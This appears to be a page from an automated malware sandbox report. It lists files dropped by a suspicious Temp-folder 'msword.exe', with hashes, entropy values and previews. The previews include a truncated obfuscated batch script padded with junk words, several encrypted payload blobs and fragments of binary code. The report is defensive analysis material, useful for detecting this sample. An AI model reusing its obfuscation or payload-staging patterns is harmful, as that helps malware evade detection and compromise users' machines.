Preview:	.x..GaQ.#....^.....Y.u..S..)}S._...=d-P\Z.ZN1\....3.eF.9.MV..H8#Y.}r...ruV....t...M?6.....m..M.#.W..2....R...~..OQ- ..X..b....O....1.f...N.o...lZ..AMD.i](./....f.J.\|..Ay..}jK.vA...\|.....'..9BQ...b?....Q...%b..$l.X....._..F.....dS.;.....1/....L.....h.6......D..-/.r^.,.....F...Hy&.T7O....V.<R....O..:..Q$.d._..N..@...QSw..V.....l...E.9..#.^.%.z.......p..k...Z...PF[..\|....b.(y.ep..mAht&..E..P..aD.. ?x"f...?.W.Q...../.A.j.m@t#.]...V.#...Z.n.4...>.l.7.%..$!....m..{e.c.......8_5)..eJU.?......-.Z.]1.._...\%...I.N....L.h.S ....7(..}.t.c.o.......!.T=w...A)$..X.....0g.\|.O;.....t..q.....ai5{..z.Om<g..g:..z.f..C..j^N.!d.V.u..s..Y....7.MA..\|{...U{..v... j=.=.}2...g..TU.\|..T..".....}.9...n..F.e.....:UU.......^..y.......R#Z0...33..IY'8u.rP.D\|.N.nN....G~..........Ib.q.fN...J.j......:..V..}...'.y8y\.d.ZN...w`.o/.^..t@.A..\|......".....7f..&..#....u.B...):.....X....A...YRF.l...6.v.jjJ.w,.o.}<.....M^.*.......\|.........auRtO.I}...h9...W.....+a..R.!y...i...E.....

C:\Users\user\AppData\Local\Temp\MSI7d646.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5065515051498046
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8wWClAlfH:Qw946cPbiOxDlbYnuRKAN/
MD5:	BF0D8FB373F1B202DFE651B32AA4DBD1
SHA1:	B34935D6FFEC344FF6F16A1D6AB57B2CDEB86D75
SHA-256:	F9F6BB3D23576C0FBB41BA4D85353C8773978E8115E0C2C240FEBDA882CF145E
SHA-512:	C05C2E8D813A6A0E3AD35856CEBC9D501FA5E9CF1C2FDCABF4E353DB73C25D69D615A7C2D069246645B238867D886DCBD993CD12DEE1821E10BFBD5E8F9B1BB7
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.5./.0.1./.2.0.2.5. . .0.2.:.5.6.:.1.7. .=.=.=.....

C:\Users\user\AppData\Local\Temp\Market

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (1646), with CRLF line terminators
Category:	dropped
Size (bytes):	30641
Entropy (8bit):	5.0857625939320155
Encrypted:	false
SSDEEP:	768:C0aoVID9DnEq27yfqXDHAPrGDr/prbVgEXVjwAjk04pv:Uoe9jEq2yK7ASn/9bVHlav
MD5:	971CB890AC9F35B6105DE0EB33095730
SHA1:	D113B90F9219237A611A8EE03040682DDBD93CE1
SHA-256:	CCF66550AC0BBD65AEFFEFFC0756F2E0669A88528F598350841CB68A6E48FBA4
SHA-512:	8CFABA88E6B9D55676A454F290A1CBB112624F6986CA441F48AE93F9132810D03337F42371BA3D5116B92B8BD1A5D12047D0139A9EF1700D6126FEE8BC70829E
Malicious:	false
Preview:	Set Operational=g..VTTbCalif-Holdem-Okay-Agriculture-..xCmIBrown-..DVwkVulnerability-Minolta-Republic-Purple-Exec-..vePermission-Take-Attempts-Recent-Salon-Successfully-Batch-Polished-..nZZDip-Atomic-Atomic-Works-Win-..MoGovernments-Rehabilitation-Ipod-..fKLQConfidentiality-West-Sunglasses-..Set Lion=B..oHteBridges-Includes-Ol-Speaker-Beverly-..SVpBukkake-Plasma-Trace-Missed-..DzFTie-Seeds-Browsers-Man-Lack-Achieved-English-Advertising-..krJamaica-Satisfy-Build-Fourth-Barnes-Legs-Iran-Generation-..DZVNSubsidiaries-Pin-Children-Org-Component-Separately-Ann-..iJTm-Buried-Sol-Scripts-Founder-Rd-Promotes-Burlington-Momentum-..UPlArtificial-Through-Credit-..sQSamsung-Samples-..HSAla-Distinction-Remedies-Clip-Parallel-..zpxNamed-Funeral-Stack-Each-Save-Compensation-..Set Beads=d..UALanes-Coffee-Awareness-Claims-Subdivision-..zVChart-Ru-Myspace-Frequently-..ZGTExtra-Adaptive-..yVLevels-Directory-Appointments-Groundwater-Older-Use-Rear-Xnxx-..CIPour-Den-Till-Range-Rotary-Celebrities-..Set Egyp

C:\Users\user\AppData\Local\Temp\Market.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1646), with CRLF line terminators
Category:	dropped
Size (bytes):	30641
Entropy (8bit):	5.0857625939320155
Encrypted:	false
SSDEEP:	768:C0aoVID9DnEq27yfqXDHAPrGDr/prbVgEXVjwAjk04pv:Uoe9jEq2yK7ASn/9bVHlav
MD5:	971CB890AC9F35B6105DE0EB33095730
SHA1:	D113B90F9219237A611A8EE03040682DDBD93CE1
SHA-256:	CCF66550AC0BBD65AEFFEFFC0756F2E0669A88528F598350841CB68A6E48FBA4
SHA-512:	8CFABA88E6B9D55676A454F290A1CBB112624F6986CA441F48AE93F9132810D03337F42371BA3D5116B92B8BD1A5D12047D0139A9EF1700D6126FEE8BC70829E
Malicious:	false
Preview:	Set Operational=g..VTTbCalif-Holdem-Okay-Agriculture-..xCmIBrown-..DVwkVulnerability-Minolta-Republic-Purple-Exec-..vePermission-Take-Attempts-Recent-Salon-Successfully-Batch-Polished-..nZZDip-Atomic-Atomic-Works-Win-..MoGovernments-Rehabilitation-Ipod-..fKLQConfidentiality-West-Sunglasses-..Set Lion=B..oHteBridges-Includes-Ol-Speaker-Beverly-..SVpBukkake-Plasma-Trace-Missed-..DzFTie-Seeds-Browsers-Man-Lack-Achieved-English-Advertising-..krJamaica-Satisfy-Build-Fourth-Barnes-Legs-Iran-Generation-..DZVNSubsidiaries-Pin-Children-Org-Component-Separately-Ann-..iJTm-Buried-Sol-Scripts-Founder-Rd-Promotes-Burlington-Momentum-..UPlArtificial-Through-Credit-..sQSamsung-Samples-..HSAla-Distinction-Remedies-Clip-Parallel-..zpxNamed-Funeral-Stack-Each-Save-Compensation-..Set Beads=d..UALanes-Coffee-Awareness-Claims-Subdivision-..zVChart-Ru-Myspace-Frequently-..ZGTExtra-Adaptive-..yVLevels-Directory-Appointments-Groundwater-Older-Use-Rear-Xnxx-..CIPour-Den-Till-Range-Rotary-Celebrities-..Set Egyp

C:\Users\user\AppData\Local\Temp\Matter

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	46380
Entropy (8bit):	7.996032413296538
Encrypted:	true
SSDEEP:	768:uG8mNPfvXXy+dsh2M+5PmQ7RY4wl/lIZZ7MW7ZkmYGfKhn8jzchmbDQ:78mNPycMePvKV/qZZPiGKABbDQ
MD5:	D4B3ADC8CBB57EAB0BF606DB6A43E118
SHA1:	356174D53E6491026EB1AC8EBCEF4CF718BCE17B
SHA-256:	85ACB62961BFFD09D7B492CE0F6D127E67A80E874BD66F3E50BB02B4BBBF6E16
SHA-512:	EAD4144CE24F579C7F0E5055620257674D907F5BBD3A65868847421675985C7D81422D9076F2FBD901CEC6835C81035D464916D8E94A0CE3C9C8014C0C3DFD01
Malicious:	false
Preview:	.A...._.WLB....).=NW...i.NWmV.J.k..L.F8....h..G..4..:..av{=..M1......)GJ.q..........iT..\}.$..\|..)...31....P<..L.....~.z.....s;.k...BJ..A.m.u....Ad.%.h..K..X...lsU...`....MqJ.;5.W{".VA.H;.s.6..ql.1]..i.KM..K.K..ZzZ.f...8.qQ?-.P..y..l....t..y..'...3.XkU.. ..zxEN.2;t..."....~.b.Qe]}jRMt9...\|.a..A.2..cG.....m.H+.P'..O.".K.Kx)e..e..[...b.a...e....D[...Y...cXE.A..1j.\.....7..jj..........v.y.......#. ..p....[...A..=.t..J..!Q....e:..8o....'h*.....z1.........Vw./r8...h....L.-..C.!...."./.......`(m>.;..I..O(].R.8. M.f.\|..t5.......)..`%/Bx...O...A...p......1..B....8.......H.(....?.T...k..V.Y?m.:#....M..<G,-.K.p./.{..z.-M..+@..c......j.>MALy.A.,..H.x...4]..M.=b.[N......E.........G7.H}.Es.G.......y....\|(.%...b..+.x.Q...r0=R..9....#.......8-.f...3....,.....;U....3...,....a.0".U.C1.g0s\|.>..@G.}.C%....~..+..j.)...nm.._..)N.D...........t^.9.kE6y...%..&.VC..}.xs.0...\|.eh R.d9g.......T...dMn"..f!1q.wd.Ra%t..;I...\..e...4m...b..K.?3..05...e..-....X.$....

C:\Users\user\AppData\Local\Temp\Metallic

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	151552
Entropy (8bit):	5.35483837732914
Encrypted:	false
SSDEEP:	1536:iKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmo:86whxjgarB/5elDWy4ZNoGmo
MD5:	ACAC13DC82CE749F727F0C81BA5FDC73
SHA1:	5350FE77594467906A5251B8C2248CD81D15D8E2
SHA-256:	B6A35AC20BAED2784E793E577670B5AE1062890CB9BC4D931A9F0BC874B2A612
SHA-512:	C86B8DD695DAE4626631AF41497C73250A73967E28A9F3472F2D344C4FF2F7FBAF9101FBD5EC45124537DF823951C5E09FE0696488AD599D6AFA77DDB918364F
Malicious:	false
Preview:	.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.!.!.!.!.!.!.!.r.r.r.r.r.r.r.r.r.r.r.r...........r.r.r.r.r.........................)...........................r...........r...r.....r.....r.........................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r

C:\Users\user\AppData\Local\Temp\Peripheral

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.99766272586728
Encrypted:	true
SSDEEP:	1536:rY1/zHVTJE2KI6zH3+Te0hDcnNsoExtf4Ahg/IdAGIrYJy6B8:rEbVTJxKlzH3we0aA74cIYJG
MD5:	2C4CFD8A5B0E70B3B8E872FC1091C9CA
SHA1:	2C6C8DC12CA41DA972D3B393129506C9B9CBA0CD
SHA-256:	E7051EC0A2700737D0C85441EF433D0041451623346D2933F4AD602C88C83BDE
SHA-512:	19E74E8777D5FB850CECF1E95219F7EBC8648C29A24647B72CE94A5E1286CA3FCFFA9FD8AD19F689B1A3466A109DAFBA2D10DBC85FDC1610FC0716CE4018174E
Malicious:	false
Preview:	.....,`.L..`.$.\F.\|.9$......\|.?.'UB..Z.p.......7.7.k.).1.S.Mu..#...; ejR.z...Y.}.H..NuT..N...L.!.u.$.`fW..M.L$d`..'.%......6..1.<.Q.]..Q.2..??bH........D..T..\|~."W..1.+ck.5h....a...[.?~...6..%.$$dQ.\..j.ho+.........7......e....p..\Mh"...#{u..F...?.....]#.s?....[.A..~^....\|^+......]..b.........+](..%...`....j-....&y.Zm.j[...`=S..K..Wg@ebB.7Fb.K...\I/...Y.....@.8E.e...'8.}v.7..z..S.#@...`D..mh6i..L...$..9...Ay.N.'YR.r#......."Q..3...x_..r......\.....;......`...$\BH.....>l"gg..Q.e........S.Y.[e"... .{.}..M6..V.(v.....>.<AY.Ih......$...(0...J.Q.L.IT.:3<S...y.M.$..,.#..IX."....K...yE./>.6.......M[.I3.3\|r.7.v...R.&.GR ...?..%.mn....R.......~.....v.... `N...DB....... ..u..::P....R...8..I....."....f1.......@bk....[.D"..;*..i.......a...3......k4~........o..3...D..,...O.>.p..n.!.~'?In.J.3.cdQ.......cD...B&.....x......6...@...^u$.3....~z...Z..`.B...f..K....d.aYy...d...M..P..(.W6...,Z2.:.)....l.E'..D......C.8.S...E.j...N3.j..\|...a..z...bJ..@

C:\Users\user\AppData\Local\Temp\Phentermine

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	7.997800401356153
Encrypted:	true
SSDEEP:	1536:elqGCsW9l+3prMB5cOkKl+9yib0wRGnqJpxQbEvleUtqrc3HxO:eHCsW9KlMCsBib0wRzybHURO
MD5:	49EFDFC03CCDA219825C385B3B35FB43
SHA1:	CB1B3E7C95E0C457DE0A8879073301B44A12FA3A
SHA-256:	F98C5BCC2A2A7ABDC448A2C048326AED45A9A914A2AB3EA4D1BA4ADA7D810144
SHA-512:	560FE3EE3F80850EB5D6813327D165AF384B31691D35694C4E4385F5B0BB895747042D97D4F63C9FA611ACA0A642924CF9DEAD30EC035EEE62A87FDDBCD1B8F4
Malicious:	false
Preview:	....a.W....>.2<1?..i..5.wapA...K1.x^[.$F.._..+ZlT.yk..8/..f:...\P```.......I@pXOx)].........0.....!.....R;N).M.i.:....]...QbAQ..;..X..k..fj..Fh....3[.....D..!..nt..s..v...M\|~..(..Y-O.[91....G.ne.e.#9.X...0.......h>.6....y..M{&..`.{ ..B.DR7h.9.......K<".9..X.Jb0w.-..@.\|....7e.+.Y^w.3....)-........VmM....<MR.V..Hc..<.e7..G.R.mG......../..d.\|R#.>87$....S..R.~.2..j,..b.....r......e(..7"..3.R....h...J...J9.l.......27V.E.0rg.)%.t..T(....k.\.....x......Zw.".?.]?._.Y..z.IG.".b.w.4.GX.w..n..9}.=.......-..@.Q.Z...-........f/.5..(....D.....j..i%;.v.k}.J8.l...>.dl.\|..cE..8@=....\..4....'..}...M...Ze..%.<%lk.....O..!?.l..,.t..Z.a.....6..S6kD.%...e............U...Z..8..cG-Q.=.AQF..F.s....B..=x:.s&..A8CC....^...3/n..R..YO ...^.l...=.~.d.a.1..7....'.:$..H:1..3Z=..4MH.LR&+}M..........V[....!.....v.v..{.9.%....>Hu...P..Av.$l.7........1;...~...BN..!.1.*.........JI#...l=.......Q.).`...e..J.q...=..E..7'!...b..~L.`.:.Y..........\|.......c.?..s&....e.<.......

C:\Users\user\AppData\Local\Temp\Presidential

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	37009
Entropy (8bit):	7.161342216267482
Encrypted:	false
SSDEEP:	768:E9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:EATGODv7xvTphAiPChgZ2kOE6
MD5:	54C230191C78CF10807F0D4EAA561CBF
SHA1:	70A2B2019668F5BB8C3D58C64EEB34C9907B55E6
SHA-256:	A656398863A57CA942F748B9A697DE3217C0E1843679D1E8D6C8AC98F8C1E02A
SHA-512:	3F195D1212295BE976285DF384612F26E174E1F2DE679B209EF8861999E430DE13EA6E3DEC8747F4DDF227F44DFEB2A6112D137CB208572C5EF9B4F2D42502DF
Malicious:	false
Preview:	3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4 4$4*4.444>4H4R4]4e4i4o4s4y4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5!5,54585>5B5H5R5\5f5q5y5}5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6!6+656@6H6L6R6V6\6f6p6z6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7!7%7+757?7I7T7\7`7f7j7p7z7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8#8+8/85898?8I8S8]8h8p8t8z8~8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9"9,979?9C9I9M9S9]9g9q9\|9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:.:":,:6:@:K:S:W:]:a:g:q:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;";&;,;0;6;@;J;T;_;g;k;q;u;{;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<#<.<6<:<@<D<J<T<^<h<s<{<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.=#=-=7=B=J=N=T=X=^=h=r=\|=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>#>'>->7>A>K>V>^>b>h>l>r>\|>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?%?-?1?7?;?A?K?U?_?j?r?v?\|?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...@..8....0.0.0.0.0$0.090A0E0K0O0U0_0i0s0~0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1.1.1$1.181B1M1U1Y1_1c1i1s1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2$2(2.22282B2L2V2a2i2m

C:\Users\user\AppData\Local\Temp\Query

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	6.68140784602293
Encrypted:	false
SSDEEP:	1536:9U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI93s:9UDQWf05mjccBiqXvpgF4qv+3s
MD5:	E5F5603745AC7E491627F61F770384E1
SHA1:	71B49644F3C8659C075CFA4CFDDBA22588131FB1
SHA-256:	9706522D1D008FE36CC3D7BB32A3C33B18530BA86A7E5E557B0D95ECE20BE281
SHA-512:	6D84B641C97BF6DD3C075EB59803D97483E3167D1D72871BE14B1F9519751D6A74AC973BF9E50D5A3D5A7B954DC939A8063DD91EA1123581170053C48D9C5237
Malicious:	false
Preview:	.3.M.............e...........Y...3.P.u(..`....u P..H...P..d...P......P.E$..U.PS.u.E.Q.u..M.P......4...._....M(......]..IX;........E......;............;.........`....u.j)Zf9........},........U..U.........B....M...\|....M..M..M..M..M.M.3..\........;..d.....O....}.........................H....]...D...3..u..u(.M.P.u..v@S....3.....9...v.......w....M...u..G....w.....M.E..E..E..M..M...\|....E...........................j.X;.......j.X;........M.....3...j.X;...(...;... .....j.X;...&...j.Y.G.;.K ..+K.....#U..}...U.M..."....U.j.^f.:..U......j]Xf9F........ ....M..M....\|....M..M..M.;...%.......E...l....E.;...(....U......],.......t.....+.G.;.......j.Y.G...U....jxXf....f....f.....@...U....SV.u......W.}...U.M.;........E.3.M.........%.....E........u.;.w/.}...+.A..M.............:...F..:;.v.u..}..E.......w......;........E._^[..U..V.u.W..t...9N....I.Bf;.t......H_^].3...U.......SVW....1L...3.}.B..A.......;.......jw[..>..j.Y..}........u...........f;.......@f;............f;........

C:\Users\user\AppData\Local\Temp\Syndicate

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.998187805046269
Encrypted:	true
SSDEEP:	1536:KSaJEMoNVX8cEynrHSHmrTLT8SJj9PEv/61VZApRnWEmx/4gzVja:4vozi0rZ3Jp8nWkRnTy/Ra
MD5:	5EBB42ADED1C56715BA1EC98BC2638F1
SHA1:	9B3AD86BE972BC59ECF45C249FD38A4DFD762FFF
SHA-256:	D302B56F0FABFB24855D94C90BBDD829837B8FA85B1C6777CF2E20B5526BB602
SHA-512:	256645AC47FE31AA2147906BC5A53BA328F288E20D44ADCD0ADFF9E386DDDF63A8C9A161D675F35E56443985A6D811F0FED2F48C526A17C0923B6653D4EE2CA5
Malicious:	false
Preview:	....R...e.".>..?.%R;<..2.....E.....6.P.?...<{......p..B....K..$...T....83H...JD.....CX...[Z.m.h/.]...+e.&..h.....y..............4x.)...{..E"........6..s>#{.%C..t.E.C...{6..........G.x.\|..........>w..9.9......F..K9..?..w...'Npv....x?u.\\...O.=.....1.y......^......b].(....5.sk..G..B%..s.6...P...U...K.D.{.Fp.?9.fl_.{.`...'.......PN.#.....5...D......u....?.m..\..G...HM7u.....K}...;.M.]..E.`..!X.i....j..s_nX.W....^...6.K;...BZ...2..)I}.?...0..h..).0.s..%Tr...~...kC.JZ.n:...c..X..yUAB.Xj..N..\|......l8.V(0e..Ml.iG...7...m.6..kX..kZ....y/<..^..1.F...t.....U0...,.1.p...1../.Z...A.>.....F..Ow.^.. .0...V.m.........Nl...xy.V.................ic.+...k..^......C.y...I..hg...a..y8B.........O...b.1...C}...M.VT. .....@.l,...H.7..y....1.......\T..81%..9.s/..M..F.I.c,. .\.,M@=.tb.wy..O...O..g.,*.9.I......R~...$.....(f....7..~T../l..y........,S.MmbT.<.$J.k...`.........'..oV.4.)KW.-.3q...ypE]....<..'..A......b4..IUH4`.N.......Rz..^...S..t.m.i....7./.ze

C:\Users\user\AppData\Local\Temp\Usgs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	7.997337841606491
Encrypted:	true
SSDEEP:	1536:YFpYViuJWu7d6d6xm/8PleBlivu2/a3gvGUttQue1:YDYsuvS8PBvu2bu791
MD5:	86BDDDBF60A6B1CE21D695171B5B50A7
SHA1:	3EDCC074129F105DB4EAD779D08BE20D6812EE15
SHA-256:	A3A5647BB284F7F395407A00D9EFAEACF0D54C8E79FBA8BC28FE826183F24EAA
SHA-512:	26657048694FB307E80BBE91964BF4DFEBAFD0729669CD9F2290C7E139EC1CE21C3410CEBA3B7C2F0CE3A4DBF57BFB62248670DC9CB9CCCE3BAF1096E484C27D
Malicious:	false
Preview:	A...../"..}....X...2u.).)...8.n.O..+......JG....z..U..y....g...(...NJ...+j..y...g.ar.R..~........!5..^ .<......(...K...@..5..#..w.@,9..d.1.\^...E...^...g.zxTbi.i-y...{;a..3.e...N]a`}..q.Q.....Mt...Y.Tz...;...?v......C.k..fZg.\...4I....>i..`:..Q&....1.g..c........M..'....'.O....F ..W..J.....2.U.x..Z}.o.....9.x........6..Q...M\|F=..@...pV...F.HwE.?.&...`b.j...c.8\|.l..Kp.%)].F...-...q......z.=...A&..s..7..F..2..R.........-..#N..q..M...(I...H...r@.-P...0.&...[.$.v......\|..6....xFp..gR..u\|....L.l..II.H.g.^+K.v.....9..x...P&(n.l.W.[.J.LoE'.. ....T._...\|W.g..$.q)..e.q..=.<..J6....,A&..=.J.9S...,8+e-zL...../qM.2G...)....4. ...e...v...mu,#.>..._.%m.....0.......z..*Yf;n.H.3...'.....~H.x..0...u...V..).L..o..x.q(..!F.J.).Ht.q..o.!..>A..NR..M.b.u.7......Q4.3..p...kR&t......Gp..C.. .6...'4B...;7......Kh1S...m.t..mfR.+.....sB#Z.....>z.'......\|.@yg.....pa.3.s....=....f.....Uq...V..,:Z(.GJ6.-d..n.....CF}i.?...........M.I ....d..U..-.R..9.#H......>.M.SL.

C:\Users\user\AppData\Local\Temp\Veterans

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	130048
Entropy (8bit):	6.658223104333049
Encrypted:	false
SSDEEP:	3072:Z0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBZ:QbfSCOMVIPPL/sZ7HS3zk
MD5:	5CD6AF8D1D071C54D081DF22F7D057AB
SHA1:	330782E2FCEB552E894643FDC40AFFADD187044E
SHA-256:	BCFBF03BFE8181B81F3A1FF2D3774233CE013596FB3F4F535819FC422B696CEE
SHA-512:	4F6CB5F41F5D338B998A075C532EB500806463C14FB9AB0B3945CA5AA24CC2DDD12F3D0E02D91FEF513AA3602A9E29CF69ABBE12181BA625DFC7F0E325F3D6F7
Malicious:	false
Preview:	......L...A;.v.....8.u.F.........@...u..v...............^....~.3..~........9=."M.t.V................h.....F.WP.qV.....kE.0.E.....L..E.8...t5.A...t+..............s.....L..D..B..A.;.v....9.u.E.G....E...r.S.^..F....................E..N.j.....L._f...R.f...I....u.V.....Y3._.M.^3.[..=....].....I..."M.....I..."M.....U..U.W3.f9:t!V..q.f.....f;.u.+.....J...f9:u.^.B._]..U..QSVW....I...3...tVV....YWWW..W+...SVWW....I..E...t4P..j....Y..t.3.PP.u.WSVPP....I...t...3...3.W.[..Y.....t.V....I._^..[..]..VW....I.....u.3..7SV.+...+......S.i....YY..t.SVW.?.....j..6[..YV....I.[.._^..U....S.]...u..$$............\|VWj=S...S...E.YY..tN;.tJ.x...5..M.....E.;5..M.u.V........E.Y.5..M.3........9].t/9...M.t'..N....un.#...........W.Z..Y_..^[..]..t.3...j.j...}..S...M..kZ...5..M......t.9...M.u%j.j...}..S...M..BZ.....9...M.t..5..M...t..E..+.PQ......E.YY..xH9.tD.4...Z..Y.M.8].u..E.........D.....A9..u.j.QV.HX..S....Y........tX.P8].........E..H.;............?......j.QV..X..S...Y..............M..

C:\Users\user\AppData\Local\Temp\Viewed

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996808997159829
Encrypted:	true
SSDEEP:	1536:v8HYZV3DRdZOzj3zNzH65bsZj94bitw+XZ/VCuc:3SzFbaoH1/VCd
MD5:	01E51A0D2AC4E232BB483444EC14F156
SHA1:	8DB19310817378BCF4F59F7E6E8AC65E3BAD8E2F
SHA-256:	27D2E36B97DBA2657D797098D919F7C76893713537FF4ABA5F38CB48BC542EF9
SHA-512:	C982A98AE76F1DC6459F868C9F7B79D9CD3372C2045FD10FA1A876EC03367F77E4BE9CCD27BBEAEB58E8C3C06E838A7DE44057069F8CF1E7925CEA14397E0962
Malicious:	false
Preview:	...0.p;...Z...W.aM..:.3p3...^6.@!...R.G..9......S...)`G...<\..X..y.$D.4.>m..c>....)S)...Q.gxuw......+......?e.i..7)...u...$.....&..g.....rwZ......M.2.`...@.?<..l..m..-.}_..P3..........\|..~\|)(k...Cc.N.J...i.H..[S(...d.......n2zst.A...[V2x.[.........L...\ut..x(.5'j.W..t..N..W.`7..D.j.?...R..27.M..elZ...e.(!,K...J.;Fw.V.g.]-..C.-.n8Au....\|U..D$.]....h..0.l....W..-..E>Q,.?..v.q....0.....L..R.39uH.I.6..:. ..j...$$QW.#..m1.....4..=v...`1.M..f.....XL....R...M..x....P..S...'.G..6..^.+S.H.x...\|.%B....]...+.!81$C..uI...w...S....>.gz....V.\|.K..j..W{...a...-\.n...t0L../.w.:Q...(V.(]......RSs@.O.........vNB..U`v.C.....<H.}.WE....g{v.......Aq.l....<D.3..c^..#.@.w.9f..78t5l..]..%..AUCT.=.s.=.}..m....wr.W..7==..9.L.~..b~}^....a...F....Q.0>fH.....Y....s....?..!.e..!.3..R.S8.fY.......?..6l..;p+T.4...f\|..sor.e......x..lP.U..<.........k...B.,..H../....qY..... ..R0Xn..ygP.%..B..m."D.5..).8.wh.=..Y.D.......7...d:.sz.{.R.)m..~...i;.......s.9D

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bihvhc0a.ue4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkzsp3ou.12v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2e0on5b.wl0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ki20yhc2.tjj.psm1

Download File

